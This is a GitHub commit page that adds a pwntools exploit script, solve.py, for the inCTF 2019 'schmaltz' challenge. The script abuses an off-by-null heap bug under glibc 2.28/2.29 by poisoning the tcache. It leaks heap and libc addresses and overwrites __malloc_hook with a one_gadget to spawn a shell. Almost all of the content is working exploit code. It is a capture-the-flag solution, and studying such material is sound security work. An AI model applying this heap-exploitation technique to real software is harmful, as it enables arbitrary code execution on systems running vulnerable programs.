Commit 36a5592

committed

off-by-null in glibc2.29

1 parent ee35e74 commit 36a5592Copy full SHA for 36a5592

File tree

5 files changed

+80

-0

lines changed

inCTF2019_schmaltz

5 files changed

+80

-0

lines changed

`‎inCTF2019_schmaltz/ld-2.28.so‎`

1.31 MB

Binary file not shown.

`‎inCTF2019_schmaltz/libc.so.6‎`

16.3 MB

Binary file not shown.

`‎inCTF2019_schmaltz/schmaltz‎`

12.8 KB

Binary file not shown.

`‎inCTF2019_schmaltz/schmaltz.i64‎`

177 KB

Binary file not shown.

`‎inCTF2019_schmaltz/solve.py‎`

Lines changed: 80 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,80 @@`
	`1`	`+#!/usr/bin/env python`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.log_level = "critical"`
	`7`	`+context.binary = "./schmaltz"`
	`8`	`+elf = context.binary`
	`9`	`+libc = ELF("./lib/libc.so.6", checksec = False)`
	`10`	`+libc.sym["one_gadget"] = 0xe0021`
	`11`	`+`
	`12`	`+def add(size, cont):`
	`13`	`+ io.sendlineafter("> ", "1")`
	`14`	`+ io.sendlineafter("> ", str(size))`
	`15`	`+ io.sendafter("> ", cont)`
	`16`	`+ sleep(0.01)`
	`17`	`+`
	`18`	`+def show(idx):`
	`19`	`+ io.sendlineafter("> ", "3")`
	`20`	`+ io.sendlineafter("> ", str(idx))`
	`21`	`+`
	`22`	`+def delete(idx):`
	`23`	`+ io.sendlineafter("> ", "4")`
	`24`	`+ io.sendlineafter("> ", str(idx))`
	`25`	`+`
	`26`	`+def DEBUG():`
	`27`	`+ info("malloc @ {:#x}".format(0x400A94))`
	`28`	`+ info("fill @ {:#x}".format(0x400B66))`
	`29`	`+ info("free @ {:#x}".format(0x400961))`
	`30`	`+ info("offbyone @ {:#x}".format(0x40088A))`
	`31`	`+ info("show @ {:#x}".format(0x400A10))`
	`32`	`+ pause()`
	`33`	`+`
	`34`	`+io = process(["./lib/ld-2.28.so", "--library-path", "./lib", "./schmaltz"])`
	`35`	`+`
	`36`	`+add(0x68, '0' * 0x68)`
	`37`	`+add(0x100, '1' * 0x100)`
	`38`	`+`
	`39`	`+delete(1)`
	`40`	`+`
	`41`	`+delete(0)`
	`42`	`+add(0x68, '0' * 0x68)`
	`43`	`+`
	`44`	`+delete(1)`
	`45`	`+`
	`46`	`+add(0xf0, flat(elf.sym["note_table"] + 0x20))`
	`47`	`+add(0x100, '\n')`
	`48`	`+add(0x100, flat(elf.sym["note_table"], p32(0x100), p32(1), elf.sym["stderr"], p32(0x100), p32(1)))`
	`49`	`+`
	`50`	`+show(2)`
	`51`	`+io.recvuntil("Content: ")`
	`52`	`+heap = u64(io.recvuntil('\n', drop = True).ljust(8, '0円')) - 0x2d0`
	`53`	`+print("heap @ {:#x}".format(heap))`
	`54`	`+assert heap & 0xfff == 0`
	`55`	`+`
	`56`	`+show(3)`
	`57`	`+io.recvuntil("Content: ")`
	`58`	`+libc.address = u64(io.recvuntil('\n', drop = True).ljust(8, '0円')) - libc.sym['_IO_2_1_stderr_']`
	`59`	`+print("libc @ {:#x}".format(libc.address))`
	`60`	`+assert libc.address & 0xfff == 0`
	`61`	`+`
	`62`	`+add(0x68, '0' * 0x68)`
	`63`	`+add(0x110, '1' * 0x110)`
	`64`	`+`
	`65`	`+delete(4)`
	`66`	`+`
	`67`	`+delete(3)`
	`68`	`+add(0x68, '0' * 0x68)`
	`69`	`+`
	`70`	`+delete(4)`
	`71`	`+`
	`72`	`+# DEBUG()`
	`73`	`+add(0xf0, flat(libc.sym["__malloc_hook"]))`
	`74`	`+add(0x110, '\n')`
	`75`	`+add(0x110, flat(libc.sym['one_gadget']))`
	`76`	`+`
	`77`	`+io.sendlineafter("> ", "1")`
	`78`	`+io.sendlineafter("> ", "1")`
	`79`	`+`
	`80`	`+io.interactive()`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 36a5592

File tree

5 files changed

5 files changed

`‎inCTF2019_schmaltz/ld-2.28.so‎`

`‎inCTF2019_schmaltz/libc.so.6‎`

`‎inCTF2019_schmaltz/schmaltz‎`

`‎inCTF2019_schmaltz/schmaltz.i64‎`

`‎inCTF2019_schmaltz/solve.py‎`

0 commit comments